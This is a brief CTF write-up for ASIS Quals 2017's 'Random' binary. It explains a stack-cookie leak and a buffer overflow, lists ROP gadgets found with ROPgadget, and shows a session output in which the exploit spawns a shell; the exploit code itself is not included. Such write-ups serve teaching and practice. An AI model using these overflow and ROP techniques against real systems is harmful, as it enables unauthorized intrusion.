ASIS 2017 Quals Random10 Apr 2017
This is a write of the cahllenge Random from ASIS Quals 2017 CTF
Its a simple 64-bit binary which generates 'random' numbers, it has stack cookies.
It was not necessary to reverse engineer the binary as it has odd and exploitable behaviour.
The binary behaves differently locally and remotely. Locally it returns only 0 when giving random numbers. Remotely is returns what looks like random numbers. After a short while of debugging I deduce that it is leaking the stack cookie. Also there is a buffer overflow when leaving a comment.
I found ROP gadgets using
$ ROPgadget --binary Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1 Gadgets information ============================================================ ... 0x0000000000400f88 : mov rdx, rsi ; ret ... 0x0000000000400f8c : pop rax ; pop rdi ; ret ... 0x0000000000400f61 : pop rsi ; pop r15 ; ret ... 0x0000000000400f8f : syscall ; ret
These gadget are enough to make syscalls with 3 arguments, so I made an exploit:
Running it pops a shell:
$ python doit.py [+] Starting local process './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1': Done [*] Stack cookie = 0x0000000000000000 [*] Switching to interactive mode $ bash -l $ cowsay "I got shell" _____________ < I got shell > ------------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || $ ^C [*] Interrupted [*] Stopped program './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'